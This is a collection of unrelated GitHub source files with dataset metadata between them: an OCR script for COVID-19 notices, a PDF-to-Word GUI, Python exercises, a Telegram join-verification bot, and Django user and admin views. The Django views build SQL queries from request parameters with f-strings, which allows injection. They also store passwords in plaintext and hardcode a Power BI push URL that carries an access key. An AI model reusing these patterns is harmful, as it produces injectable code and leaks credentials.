thresh = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)[1]
# Find contours, obtain bounding box, extract and save ROI
ROI_number = 0
cnts = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
cnts = cnts[0] if len(cnts) == 2 else cnts[1]
lst = []
for c in cnts:
x,y,w,h = cv2.boundingRect(c)
cv2.rectangle(src, (x, y), (x + w, y + h), (36,255,12), 2)
ROI = original[y:y+h, x:x+w]
# cv2.imwrite('ROI_{}.png'.format(ROI_number), ROI)
# 面積が最大の矩形を記憶(ただし画像全体を覆う矩形は除外)
area = w * h
if (totalArea * 0.9) > area:
lst.append((ROI_number, area, x, y, w, h))
ROI_number += 1
# 矩形面積の降順に並び替え
lst.sort(key=lambda x:-x[1])
# 1番目:「クラスターの感染」、2番目:「○月~」なハズなので
# 2番目の y+h から 1番目の y までを切りだす
first = lst[0]
scond = lst[1]
top = (scond[3]+scond[5])
bottom = first[3]
if top >= bottom:
print("注記位置を特定できませんでした")
return src
img = original[top:bottom]
return img
# 拡大と白黒化
def grayAndResize(src):
neiborhood24 = np.array(
[
[1, 1, 1, 1, 1],
[1, 1, 1, 1, 1],
[1, 1, 1, 1, 1],
[1, 1, 1, 1, 1],
[1, 1, 1, 1, 1],
],
np.uint8,
)
height = src.shape[0]
width = src.shape[1]
dilated = cv2.dilate(src, neiborhood24, iterations=1)
diff = cv2.absdiff(dilated, src)
contour = 255 - diff
gray2 = cv2.resize(contour, (int(width * 2), int(height * 2)))
th, img = cv2.threshold(gray2, 180, 255, cv2.THRESH_BINARY)
return img
def recognize(jpg_path):
src = cv2.imread(str(jpg_path))
hei = src.shape[0]
wid = src.shape[1]
# 画像の上25%~60%でカット
img = src[int(hei * 0.25):int(hei * 0.6)]
# cv2.imwrite('remarks_ptn2_1_cropped.jpg', img)
# 画像内の矩形を抽出
img = cropTable(img)
# cv2.imwrite('remarks_ptn2_2_rected.jpg', img)
# 拡大と白黒化
img = grayAndResize(img)
# cv2.imwrite('remarks_ptn2_3_resized.jpg', img)
# 範囲指定
# ref http://blog.machine-powers.net/2018/08/02/learning-tesseract-command-utility/
txt = pytesseract.image_to_string(img, lang="jpn", config="--psm 11").replace(".", "").replace(",", "")
print(txt)
# ※1 ※2 または (注) で始まる文を抽出
remarks = re.findall("^(.*?\d{1} .*|\(.?.* .*)$", txt, re.M)
def normalize(txt):
# 行頭の ※1 ※2 や (注) を削除(空白以降を抽出)
txt = txt[txt.find(' ') + 1:]
# 空白を除去
txt = txt.replace(' ', '')
# 画像切れて認識できない「掲載。」を補完
txt = re.sub('検査を行ったものについて掲.*$', '検査を行ったものについて掲載。', txt)
return txt
remarks = list(map(normalize, remarks))
print(remarks)
return remarks
| code4nagoya/covid19-aichi-tools | recognize_main_summary_remarks_2.py | recognize_main_summary_remarks_2.py | py | 3,539 | python | en | code | 6 | github-code | 1 | [
{
"api_name": "cv2.cvtColor",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "cv2.COLOR_BGR2GRAY",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "cv2.threshold",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "cv2.THRESH_BINARY_... |
22048125267 | from cProfile import label
from tkinter import*
from tkinter import messagebox
from tkinter.filedialog import askopenfilename
import os
# import win32com.client
from pdf2docx import Converter
class ventana(Tk):
# Constructor
def __init__(self,*args,**kwargs):
super().__init__(*args,**kwargs)
self.title("Convertidor de pdf a word")
self.geometry("300x200")
self.resizable(0,0)
self.widgest()
def salir(self):
valor = messagebox.askquestion(title="Convertidor de pdf a word",message="¿Esta seguro que deseas salir?")
if valor == "yes":
self.destroy()
def archivo(self):
valor = askopenfilename(defaultextension=".pdf",filetypes=[("Selecciona solo archivos .pdf","*.pdf")])
if valor:
self.generate_word2(valor)
def generate_word2(self,valor):
try:
labelFile = Label(self,text="Cargando...")
labelFile.place(x=30,y=39)
ruta = os.path.abspath(valor)
ruta_final = os.path.abspath(valor[0:-4] +".docx".format())
cv = Converter(ruta)
cv.convert(ruta_final,start=0,end=None)
cv.close()
labelFile.destroy()
messagebox.showinfo(title="Convertidor de pdf a word",message='El archivo se genero correctamente en la siguiente ruta: '+ruta_final)
except Exception as e :
messagebox.showerror(title="Convertidor de pdf a word",message=str(e))
# def generate_word(self,valor):
# try:
# word = win32com.client.Dispatch("word.Application")
# word.visible = 0
# ruta = os.path.abspath(valor)
# wb=word.Documents.Open(ruta)
# ruta_final = os.path.abspath(valor[0:-4] +"docx".format())
# wb.SaveAs2(ruta_final,FileFormat=16)
# wb.Close()
# word.Quit()
# # labelFile.destroy()
# messagebox.showinfo(title="Convertidor de pdf a word",message='El archivo se genero correctamente en la siguiente ruta: '+ruta_final)
# except Exception as e :
# messagebox.showerror(title="Convertidor de pdf a word",message=str(e))
def widgest(self):
labelFile=Label(self,text="Selecciona el pdf que deseas convertir.")
labelFile.place(x=30,y=15)
# Botones
btnquitar=Button(self, text="Seleccionar Archivo", command=self.archivo, width=35)
btnquitar.place(x=30, y=90)
btnquitar=Button(self,text="Salir", command=self.salir, width=35)
btnquitar.place(x=30, y=130)
if __name__ == "__main__":
app=ventana()
app.mainloop() | DarguinBarbosa/Convert-pdf---word | convert.py | convert.py | py | 2,661 | python | es | code | 2 | github-code | 1 | [
{
"api_name": "tkinter.messagebox.askquestion",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "tkinter.messagebox",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "tkinter.filedialog.askopenfilename",
"line_number": 24,
"usage_type": "call"
},
{
... |
11669927645 | # 9-13 Practice
from collections import OrderedDict
word_dict = OrderedDict()
word_dict['if'] = "如果"
word_dict['else'] = "其他情况"
word_dict['for'] = "有限循环"
word_dict['while'] = "无限循环"
word_dict['raise'] = "抛出异常"
word_dict['try'] = "捕获异常"
word_dict['catch'] = "处理异常"
word_dict['finally'] = "捕获异常之后"
word_dict['def'] = "函数"
word_dict['break'] = "停止"
for k, v in word_dict.items():
print(k + ": " + v)
# 9-14 Practice
from random import randint
class Die():
def __init__(self, sides=6):
self.sides = sides
def roll_die(self):
return randint(1, self.sides)
six_sides = Die(6)
ten_sides = Die(10)
twenty_sides = Die(20)
for side in range(0, 10):
print("第" + str(side + 1) + "次: " + str(six_sides.roll_die()))
for side in range(0, 10):
print("第" + str(side + 1) + "次: " + str(ten_sides.roll_die()))
for side in range(0, 10):
print("第" + str(side + 1) + "次: " + str(twenty_sides.roll_die()))
# 9-15 Practice
# Python module of the week | bombasticRY/PythonCrashCourse-Chapter1-11 | Chapter9/05HM.py | 05HM.py | py | 1,066 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "collections.OrderedDict",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 27,
"usage_type": "call"
}
] |
34024693827 | #!/usr/bin/env python
"""Setup script for installing sofia."""
from setuptools import setup
config = {
'name': 'sofia',
'version': '0.0.1',
'description': 'GUI',
'author': 'Danna Xue',
'author email': 'dannaxue@stanford.edu',
'url': 'https://github.com/dannaxue/sofia.git',
'download_url': 'https://github.com/dannaxue/sofia',
'license': 'MIT',
'packages': ['sofia'],
'scripts': ['bin/sofia']
}
setup(**config)
| dannaxue/sofia | setup.py | setup.py | py | 455 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "setuptools.setup",
"line_number": 19,
"usage_type": "call"
}
] |
40891943622 | import asyncio
from datetime import datetime
from aiogram import types
from aiogram.utils.markdown import code
from init import bot, config, dp
from utils import try_sending_message
from verify import *
from verify import Status
# init
async def on_startup(app) -> None:
"""Simple hook for aiohttp application which manages webhook"""
await bot.delete_webhook()
await bot.set_webhook(config["webhook_url"])
async def start_worker() -> None:
await bot.delete_webhook()
await dp.start_polling()
# handlers
@dp.callback_query_handler()
async def pressed_verification_button(cb: types.CallbackQuery) -> None:
user_id = cb.from_user.id
chat_id = cb.message.chat.id
key = cb.data
if not Verify.can_verify(chat_id, user_id):
return
if key == config["key"]:
await Verify.authorize(chat=cb.message.chat, user_id=user_id)
text = f"Welcome {code(cb.from_user.full_name)}, have a lot of fun!"
await try_sending_message(bot, chat_id=chat_id, text=text, parse_mode="Markdown")
elif Verify.has_last_chance(chat_id, user_id):
text = "Incorrect answer. Make sure to get it right next time or you will be banned *permanently*."
response_msg = await try_sending_message(bot,
chat_id=chat_id, text=text, parse_mode="Markdown"
)
Verify.chats[chat_id].users[user_id].pending_messages_ids.append(
response_msg.message_id
)
else:
await Verify.reject(bot, cb.message.chat, user_id)
@dp.message_handler(content_types=types.ContentTypes.NEW_CHAT_MEMBERS)
async def just_joined(message: types.Message) -> None:
user_id: int = message.from_user.id
user_name: str = message.from_user.username or message.from_user.full_name
chat = message.chat
if not Verify.can_request_verification(chat.id, user_id):
return
values = [getattr(u, "_values") for u in message.new_chat_members]
uids = [u["id"] for u in values if not u["is_bot"]]
if not uids:
return
response_msg = await try_sending_message(
bot,
chat_id=chat.id,
text=f"Hi [@{user_name}](tg://user?id={str(user_id)})! Please answer the question below within the next (*{config['delay']} seconds*). Which emoji below represents an animal often associated with openSUSE?",
parse_mode="Markdown",
reply_markup=create_verification_keyboard(),
)
for task in asyncio.as_completed([Verify.restrict(chat, _id) for _id in uids]):
uid = await task
if not chat.id in Verify.chats:
Verify.chats[chat.id] = Chat(chat.id)
Verify.chats[chat.id].users[uid] = User(
pending_messages_ids=[response_msg.message_id],
joined_at=datetime.now(),
attempts=0,
status=Status.challenged_to_verify,
)
Verify.schedule_reject(bot, chat, uid)
@dp.message_handler(content_types=types.ContentTypes.ANY)
async def handle_otherwise(_any) -> None:
print(f"Silently handled: {_any}")
if __name__ == "__main__":
from sys import argv
import uvloop
loop = uvloop.new_event_loop()
asyncio.set_event_loop(loop)
if len(argv) >= 2 and "--webhook" in argv:
print(
f"Called with {argv}, running as aiohttp server after setting webhook."
)
from aiogram.utils import executor
executor.start_webhook(
dispatcher=dp,
webhook_path=config['webhook_path'],
skip_updates=True,
on_startup=on_startup,
host=config["app_host"],
port=config["app_port"],
)
else:
print(f"Called with {argv}, running as long-polling worker.")
asyncio.run(start_worker())
| why-not-try-calmer/O-Susie | bot.py | bot.py | py | 3,758 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "init.bot.delete_webhook",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "init.bot",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "init.bot.set_webhook",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "init.bot",
... |
71372300515 | import base64
import datetime
import json
import re
import time
from django.db import connection
from django.db.models import Q
from django.views.decorators.csrf import csrf_exempt
from operation.models import AdminLoginLog
from src.models import OneSrc
from user.models import User, Group
from utils.gen_captcha import create_img
from utils.manage_resp import resp
from utils.manage_token import get_data_obj, create_token, check_token
from utils.redis_helper import RD
from utils.send_email import send_mail
from utils.tools import img_code_overdue_decode, img_code_overdue_create
# =======================User=======================
@csrf_exempt
def register(request):
"""注册用户"""
if request.method == 'POST':
login_name = request.POST.get('login_name')
old_u = User.objects.filter(login_name=login_name).first()
if old_u:
return resp(1001, '用户名已存在')
email = request.POST.get('email')
old_u = User.objects.filter(email=email).first()
if old_u:
return resp(1001, '邮箱已注册')
pwd = request.POST.get('pwd')
if len(pwd) < 6 or len(pwd) > 16:
return resp(1002, '密码长度在6-16')
major = request.POST.get('major')
user_name = request.POST.get('user_name')
qq = request.POST.get('qq')
phone = request.POST.get('phone')
u = User()
u.login_name = login_name
u.pwd = pwd
u.email = email
u.major = major
u.user_name = user_name
u.qq = qq
u.phone = phone
u.save()
return resp()
@csrf_exempt
def login(request):
"""登录用户"""
if request.method == 'POST':
# stus = Student.objects.filter(Q(s_age__lte=18) | Q(s_age__gt=20)) # 或操作
login_name = request.POST.get('login_name')
# 获取浏览器指纹,用于校验用户的唯一性,以及多线程登陆该账号
fp = request.META.get('HTTP_AUTHENTICATION_FP')
img_token = request.POST.get('img_token')
try:
code = int(request.POST.get('code'))
except:
return resp(1003, '验证码不规范')
pwd = request.POST.get('pwd')
if not img_token:
return resp(1004, '没有传入验证码序列号')
token_flag = img_code_overdue_decode(img_token)
if not token_flag:
return resp(1001, '验证码过期')
if code != token_flag['val']:
return resp(code=1002, msg='验证码错误')
# 后台登陆标识
back = request.POST.get('back')
u = User.objects.filter(
Q(login_name=login_name) | Q(email=login_name)).first() if not back else User.objects.filter(
login_name=login_name).filter(is_admin=1).first()
if not u:
return resp(201, '当前用户未注册')
if not back:
if u.is_admin:
return resp(203, '管理员不能登陆前端')
if u.pwd != pwd:
return resp(202, '密码错误!')
# 管理员==========
# 都通过的情况下 表示该用户已经通过校验
# 如果登陆的是管理员的话,需要记录管理员登陆日志
if back:
a_l = AdminLoginLog()
a_l.login_ip = request.META.get('HTTP_X_FORWARDED_FOR')
a_l.admin_name = u.login_name
a_l.save()
# 用户==========
# 管理员不需要进行账号线程限制 enable=-1
# 用户进行线程限制
# 1. 读取当前id是否
# RD.save_uset_name(u.id, fp) # 存储当前用户线程控制指纹
# 改变用户行为
ori_op = request.META.get('HTTP_X_FORWARDED_FOR')
if u.cur_login_ip:
# 将上次登陆的当前ip赋值给上次ip
u.last_login_ip = u.cur_login_ip
u.last_login_time = u.cur_login_time
u.cur_login_ip = ori_op if ori_op else request.META.get('REMOTE_ADDR')
u.cur_login_time = datetime.datetime.now()
if u.login_count:
u.login_count += 1
else:
u.login_count = 1
u.save()
# 开始保存用户token
obj = get_data_obj(id=u.id, expire=24 * 60 * 60)
token = create_token(obj)
return resp(data={'token': token, 'login_name': u.login_name})
@csrf_exempt
def forget_email_pwd(request):
"""根据注册的邮箱找回密码"""
if request.method == 'POST':
email = request.POST.get('email')
u = User.objects.filter(email=email).first()
if not u:
return resp(201, '用户不存在')
# 获取唯一验证的字符串,过期时间、用户id,创建时间
sequence = img_code_overdue_create(id=u.id, _time=time.time(), ex=30 * 60)
if not u.email:
return resp(401, '用户未填写邮箱')
flag = send_mail(u.email, sequence)
if not flag:
return resp(402, '发送失败')
return resp()
@csrf_exempt
def update_forget_email_pwd(request):
if request.method == 'POST':
# 获取唯一的标识字符串
sequence = request.POST.get('sequence')
pwd = request.POST.get('pwd')
# 解析字符串
try:
obj = img_code_overdue_decode(sequence)
except:
obj = ''
if not obj:
return resp(401, '失效')
u_id = obj['id']
u = User.objects.filter(id=u_id).first()
u.pwd = pwd
u.save()
return resp()
def captcha(request):
# 生成图形验证码
if request.method == 'GET':
_time = time.time()
img, token = create_img(_time)
return resp(data={'img': str(base64.b64encode(img), encoding='utf-8'), 'token': token})
def check_img_code(request):
if request.method == 'GET':
token = request.GET.get('token')
val = int(request.GET.get('val'))
# 一:判断是否是某个时刻发送的
# 二:判断验证码是否输入正确
obj = img_code_overdue_decode(token)
if not obj:
# token通过校验
return resp(code=1001, msg='token过期')
if val != obj['val']:
return resp(code=1002, msg='验证码错误')
return resp()
def get_token_info(request):
"""根据token获取用户信息"""
if request.method == 'GET':
token = request.META.get('HTTP_AUTHENTICATION')
back = request.GET.get('back')
# 解析token数据
obj = check_token(token)
if obj:
u_id = obj['id']
u = User.objects.filter(id=u_id).first()
return resp(data=u.to_back_dict() if back else u.to_front_dict())
else:
return resp(code=4001, msg='token 失效')
def check_token_result(request):
if request.method == 'GET':
token = request.META.get('HTTP_AUTHENTICATION')
obj = check_token(token)
return resp(200) if obj else resp(400)
@csrf_exempt
def update(request):
"""后台修改信息"""
if request.method == 'POST':
u_id = request.POST.get("id")
group_id = request.POST.get('group_id')
login_name = request.POST.get('login_name')
pwd = request.POST.get('pwd')
email = request.POST.get('email')
major = request.POST.get('major')
user_name = request.POST.get('user_name')
qq = request.POST.get('qq')
phone = request.POST.get('phone')
end_time = request.POST.get('end_time')
enable = int(request.POST.get('enable'))
active = int(json.loads(request.POST.get('active')))
u = User.objects.filter(id=u_id).first()
u.group_id = group_id
u.login_name = login_name
u.pwd = pwd
u.email = email
u.major = major
u.user_name = user_name
u.qq = qq
u.phone = phone
u.end_time = end_time
u.enable = enable
u.active = active
u.save()
return resp(data=u.to_back_read_dict())
def format_user_list(data):
"""格式化 用户数据"""
return {
'id': data[0],
'login_name': data[1],
'user_name': data[2],
'group_name': data[3],
# 存在一个充值总金额还未添加字段
'add_time': data[4].strftime("%Y-%m-%d %H:%M:%S"),
'end_time': data[5].strftime("%Y-%m-%d %H:%M:%S") if data[5] else '已过期',
'last_login_ip': data[6],
'cur_login_ip': data[7],
}
def get_users(request):
"""后台获取用户数据"""
if request.method == "GET":
u_id = request.GET.get('id')
if u_id:
"""代表查询单条数据"""
u = User.objects.filter(id=u_id).first()
if not u:
return resp(400, '没有该用户')
return resp(data=u.to_back_read_dict())
else:
"""代表查询列表数据"""
cursor = connection.cursor()
page = int(request.GET.get('p', 1))
page_num = int(request.GET.get('n', 10))
sql = f'select a.id,a.login_name,a.user_name,b.name,a.add_time,a.end_time,a.last_login_ip,a.cur_login_ip' \
f' from user a join `group` b on a.group_id=b.id ' \
f'limit {(page - 1) * page_num},{page_num}'
cursor.execute(sql)
cursor.close()
return resp(data=[format_user_list(i) for i in cursor.fetchall()])
def get_user(request):
"""获取user分页数据,以及检索条件"""
if request.method == 'GET':
cursor = connection.cursor()
d = request.GET
p = int(d.get('p', 1))
n = int(d.get('n', 10))
tmp_d = [i for i in d if d[i]]
if len(tmp_d) > 2:
# 查询时 group_id=1&login_name=u&user_name=k&email=1096
tmp_l = []
for i in d:
if i not in ['p', 'n']:
if d[i]:
if i == 'group_id':
tmp_l.append(f'a.group_id={d[i]}')
elif i == 'login_name':
tmp_l.append(f'a.login_name like "%{d[i]}%"')
elif i == 'user_name':
tmp_l.append(f'a.user_name like "%{d[i]}%"')
elif i == 'email':
tmp_l.append(f'a.email like "%{d[i]}%"')
tmp_sql = ' and '.join(tmp_l)
# 代表有检索条件
sql = f'select a.id,a.login_name,a.user_name,b.name,a.add_time,a.end_time,a.last_login_ip,a.cur_login_ip' \
f' from user a join `group` b on a.group_id=b.id where {tmp_sql}' \
f' order by a.id desc limit {(p - 1) * n},{n}'
else:
# 代表查询所有数据分页
sql = f'select a.id,a.login_name,a.user_name,b.name,a.add_time,a.end_time,a.last_login_ip,a.cur_login_ip' \
f' from user a join `group` b on a.group_id=b.id ' \
f' order by a.id desc limit {(p - 1) * n},{n}'
cursor.execute(sql)
data = [format_user_list(i) for i in cursor.fetchall()]
sql = re.sub(r'a\.id.*?cur_login_ip', 'count(*)', sql)
sql = sql.split("limit")[0].strip()
cursor.execute(sql)
l = cursor.fetchone()
cursor.close()
return resp(data=data, count=l[0])
def get_user_count(request):
"""获取所有用户条数"""
if request.method == 'GET':
count = User.objects.count()
return resp(count=count)
@csrf_exempt
def update_profile(request):
"""修改个人信息"""
if request.method == 'POST':
token = request.META.get('HTTP_AUTHENTICATION')
obj = check_token(token)
u_id = obj['id']
email = request.POST.get('email')
major = request.POST.get('major')
user_name = request.POST.get('user_name')
qq = request.POST.get('qq')
phone = request.POST.get('phone')
u = User.objects.filter(id=u_id).first()
if not u:
return resp(201, 'not user')
u.email = email
u.major = major
u.user_name = user_name
u.qq = qq
u.phone = phone
u.save()
return resp()
@csrf_exempt
def update_pwd(request):
"""修改密码"""
if request.method == 'POST':
token = request.META.get('HTTP_AUTHENTICATION')
obj = check_token(token)
u_id = obj['id']
u = User.objects.filter(id=u_id).first()
old_pwd = request.POST.get('old_pwd')
if not u:
return resp(201, 'not user')
if u.pwd != old_pwd:
return resp(202, 'pwd error')
new_pwd = request.POST.get('new_pwd')
u.pwd = new_pwd
u.save()
return resp()
def get_user_info(request):
"""根据用户id获取用户信息"""
if request.method == "GET":
u_id = request.GET.get('id')
# 判断当前如何获取的详情数据,分析应当传递后端数据还是前端数据
# 需要检测token的值,如果传递的是admin则返回后端数据,传递的是普通的数据,返回前端的数据
token = request.META.get('HTTP_AUTH_TOKEN')
obj = check_token(token)
if obj:
# token通过校验
check_u = User.objects.filter(id=obj['id']).first()
if u_id:
u = User.objects.filter(id=u_id).first()
return resp(data=u.to_back_dict() if check_u.is_admin else u.to_front_dict())
else:
u_all = User.objects.all()
return resp(data=[i.to_back_dict() for i in u_all])
else:
return resp(code=400, msg='处于没有登陆状态')
@csrf_exempt
def add_back_user(request):
if request.method == 'POST':
login_name = request.POST.get('login_name')
old_u = User.objects.filter(login_name=login_name).first()
if old_u:
return resp(1001, '用户名已存在')
email = request.POST.get('email')
old_u = User.objects.filter(email=email).first()
if old_u:
return resp(1001, '邮箱已注册')
pwd = request.POST.get('pwd')
if len(pwd) < 6 or len(pwd) > 16:
return resp(1002, '密码长度在6-16')
# 获取其他参数
group_id = request.POST.get('group_id')
major = request.POST.get('major')
qq = request.POST.get('qq')
user_name = request.POST.get('user_name')
phone = request.POST.get('phone')
end_time = request.POST.get('end_time')
enable = int(request.POST.get('enable'))
active = int(json.loads(request.POST.get('active')))
u = User()
u.group_id = group_id
u.login_name = login_name
u.email = email
u.pwd = pwd
u.major = major
u.qq = qq
u.user_name = user_name
u.phone = phone
u.end_time = end_time
u.enable = enable
u.active = active
u.save()
return resp()
def query_user(request):
if request.method == 'GET':
d = request.GET
q = Q()
for i in d:
if d[i]:
tmp = i if i == 'group_id' else i + '__contains'
q.add(Q(**{tmp: d[i]}), Q.AND)
data = User.objects.filter(q)
return resp(data=[i.to_back_read_dict() for i in data])
# =====================管理员====================
@csrf_exempt
def add_admin(request):
if request.method == 'POST':
login_name = request.POST.get('login_name')
user_name = request.POST.get('username')
pwd = request.POST.get('pwd')
a = User()
a.login_name = login_name
a.user_name = user_name
a.pwd = pwd
a.is_admin = 1
a.save()
return resp()
def get_admins(request):
"""获取管理员列表"""
if request.method == 'GET':
a_id = request.GET.get('id')
if a_id:
a = User.objects.filter(id=a_id).filter(is_admin=1).first()
return resp(data=a.to_admin_view_dict())
else:
a_all = User.objects.filter(is_admin=1)
return resp(data=[i.to_admin_dict() for i in a_all])
@csrf_exempt
def update_admin(request):
"""更新管理员信息"""
if request.method == 'POST':
a_id = request.POST.get('id')
login_name = request.POST.get('login_name')
username = request.POST.get('username')
pwd = request.POST.get('pwd')
a = User.objects.filter(id=a_id).first()
a.login_name = login_name
a.user_name = username
a.pwd = pwd
a.save()
return resp()
def query_admin(request):
"""多条件动态查询数据"""
if request.method == 'GET':
d = request.GET
q = Q()
for i in d:
if d[i]:
tmp = i + '__contains'
q.add(Q(**{tmp: d[i]}), Q.AND)
data = User.objects.filter(q).filter(is_admin=1) # .values('id', 'login_name', 'user_name')
return resp(data=[i.to_admin_dict() for i in data])
# ====================Group===================
@csrf_exempt
def add_group(request):
if request.method == 'POST':
name = request.POST.get('name')
desc = request.POST.get('desc')
g = Group()
g.name = name
g.desc = desc
g.save()
return resp()
def del_group(request):
if request.method == 'GET':
g_id = request.GET.get('id')
Group.objects.filter(id=g_id).delete()
return resp()
@csrf_exempt
def update_group(request):
if request.method == 'POST':
g_id = request.POST.get('id')
name = request.POST.get('name')
desc = request.POST.get('desc')
g = Group.objects.filter(id=g_id).first()
g.name = name
g.desc = desc
g.save()
return resp()
def get_group_info(request):
if request.method == 'GET':
g_id = request.GET.get('id')
if g_id:
"""返回单条数据"""
g = Group.objects.filter(id=g_id).first()
return resp(data=g.to_full_dict())
else:
"""返回所有数据"""
g_all = Group.objects.all()
return resp(data=[i.to_name_dict() for i in g_all])
def to_group_one_src(request):
"""根据会员分组查找当前分组的所有资源"""
if request.method == 'GET':
p = int(request.GET.get('p', 1))
n = int(request.GET.get('n', 10))
g_id = request.GET.get('id')
g = Group.objects.filter(id=g_id).first()
tmp = [i.to_two_group_dict() for i in g.go.all()]
data = [j for i in tmp for j in i]
return resp(data=data[(p - 1) * n:p * n], count=len(data))
def get_to_name_info(request):
"""根据分组名查询分组"""
if request.method == 'GET':
name = request.GET.get('name')
g_all = Group.objects.all()
if name:
g_all = Group.objects.filter(name__contains=name)
return resp(data=[i.to_name_dict() for i in g_all])
def check_user(request):
if request.method == 'GET':
token = request.META.get('HTTP_AUTHENTICATION')
obj = check_token(token)
if not obj:
return resp(204, '用户信息过期')
u_id = obj['id']
u = User.objects.filter(id=u_id).first()
end_time = u.end_time
if not end_time:
return resp(201, '用户还未购买资源')
# 获取用户当前时间是否过期
if datetime.datetime.now() > end_time:
# 用户过期
return resp(202, '用户过期')
# 查询当前用户的资源权限
group = Group.objects.filter(id=u.group_id).first()
# 获取当前用户对应的一级分类id
cursor = connection.cursor()
sql = f'select a.id from one_src a join one_src_group b on a.id=b.one_src_id join `group` c on ' \
f'c.id=b.group_id join user d on d.group_id=c.id where d.id={u_id}'
cursor.execute(sql)
one_src_id_list = [str(i[0]) for i in cursor.fetchall()]
sql = f'select a.id from one_src a left join two_src b on a.id=b.one_src_id left join three_src c ' \
f'on b.id=c.two_src_id where a.id in ({",".join(one_src_id_list)});'
cursor.execute(sql)
data = OneSrc.objects.filter(id__in=[i for i in {i[0] for i in cursor.fetchall()}])
cursor.close()
data = [i.to_all_dict() for i in data]
return resp(data=data)
| 17-12-20-ll/fun_lib | user/views.py | views.py | py | 20,640 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "user.models.User.objects.filter",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "user.models.User.objects",
"line_number": 28,
"usage_type": "attribute"
},
{
"api_name": "user.models.User",
"line_number": 28,
"usage_type": "name"
},
{
"ap... |
22052722472 | from django.shortcuts import render, redirect
from django.http import HttpResponse, HttpResponseRedirect
from django.urls import reverse_lazy
from django.views.generic import CreateView
from django.contrib.auth.models import User
from .models import *
from .forms import *
# from .api_powerbi import *
from django.http import JsonResponse
import numpy as np
import xlrd
import os
# Create your views here.
class Crear_Usuario(CreateView): #crear usuario
model = Usuario
template_name = 'base/Usuario.html'
form_class = UsuarioForm
second_form_class = UserForm
success_url = reverse_lazy('Streaming')
def get_context_data(self,**kwargs):
context = super(Crear_Usuario, self).get_context_data(**kwargs)
if 'form' not in context:
context['form'] = self.form_class(self.request.GET)
if 'form2' not in context:
context['form2'] = self.second_form_class(self.request.GET)
return context
def post(self, request, *args, **kwargs):
self.object = self.get_object
form = self.form_class(request.POST)
form2 = self.second_form_class(request.POST)
if form.is_valid() and form2.is_valid():
usuario = form.save(commit =False)
usuario.user = form2.save()
usuario.save()
return HttpResponseRedirect(self.get_success_url())
else:
return render(request,'base/Usuario_Error.html')
def api_bi(request):
import pandas as pd
from datetime import datetime
from datetime import timedelta
import requests
import time
import random
##class for data_generation
def data_generation():
FACTURACION = random.randint(10,20)
RECAUDO = random.randint(10,20)
COSTOS =random.randint(5, 30)
GASTOS = random.randint(20, 100)
INGRESOS = random.randint(50, 500)
NOMINA = random.randint(10, 20)
COSTO_MEDICAMENTOS = random.randint(2, 10)
FECHA = datetime.now().isoformat()
return [FACTURACION,
RECAUDO,
COSTOS,
GASTOS,
INGRESOS,
NOMINA,
COSTO_MEDICAMENTOS,
FECHA
]
# if __name__ == '__main__':
REST_API_URL = 'https://api.powerbi.com/beta/a944c466-734b-4bd4-8cd8-c77d529a3150/datasets/87c5fec3-469e-4369-b5fd-136db20487e9/rows?tenant=a944c466-734b-4bd4-8cd8-c77d529a3150&UPN=ceo%40wetechin.org&key=kYjxgjRj77d7rvPRGI%2Byb0z7cfG6r91ey5Lj90bD4sO1WizwNf0z79lhENFFqGpLo2L0u8%2BW4ZkkpadXa3g%2FdQ%3D%3D'
#'https://api.powerbi.com/beta/a944c466-734b-4bd4-8cd8-c77d529a3150/datasets/a61197ae-f34a-454f-9c35-dc30e8c515d3/rows?redirectedFromSignup=1&key=bRPsa8kIiVBgdFCrhc8Bn1fZZf2o65H0oWv0AbvFOhYkvevcRWT67yvPcxJmaABDYHuuE9YJzgDGTLuFvZxOmQ%3D%3D'
# 'https://api.powerbi.com/beta/e81af6ba-a66f-4cab-90f9-9225862c5cf8/datasets/51a56115-ac32-437a-8f2c-3ed1fa1dc37a/rows?key=24THP%2FqLUg2EWnDtFiTUr8GTjjPOU%2FxjT%2BnkTt9%2FHMlkMG%2B5BhWe0pYVfsJcE8gVNitZ3C2Fp1akv3LR7hLVNQ%3D%3D'
while True:
data_raw = []
for i in range(1):
row = data_generation()
data_raw.append(row)
print("Raw data - ", data_raw)
# set the header record
HEADER = ["FACTURACION", "RECAUDO", "COSTOS","GASTOS", "INGRESOS", "NOMINA", "COSTO_MEDICAMENTOS", "FECHA"]
data_df = pd.DataFrame(data_raw, columns=HEADER)
data_json = bytes(data_df.to_json(orient='records'), encoding='utf-8')
print("JSON dataset", data_json)
# Post the data on the Power BI API
req = requests.post(REST_API_URL, data_json)
print("Data posted in Power BI API")
time.sleep(2)
# ESTA ES LA VISTA DE LA PAGINA DE INICIO
def index(request):
sub_grup = Sub_grupo.objects.all()
tam = sub_grup.count()
lista_sub_grup = []
# crear matriz de listas
for i in range(tam):
lista_sub_grup.append([])
for j in range(2):
lista_sub_grup[i].append(None)
cont = 0
for i in sub_grup:
indicador = Indicador.objects.filter(sub_grupo = i.id)
contar_indicadores = indicador.count()+10
indicadores_diligenciados = 2
porc_diligenciado = round((indicadores_diligenciados/contar_indicadores)*100,1)
lista_sub_grup[cont][0] = porc_diligenciado
cont += 1
print(lista_sub_grup)
contexto = {'lista':lista_sub_grup}
return render(request, 'base/index.html',contexto)
def Streaming(request,*args, **kwargs):
return render(request, 'indicadores/Streaming.html')
def Dashboard(request,*args, **kwargs):
return render(request, 'indicadores/Dashboard.html')
#ESTOS SON LOS TEMAS DE LA PAGINA
def tema_1(request,*args, **kwargs):
return render(request, 'base/TemaBlue/tema_1.html')
def tema_2(request,*args, **kwargs):
return render(request, 'base/TemaWhite/tema_white_1.html')
def tema_3(request,*args, **kwargs):
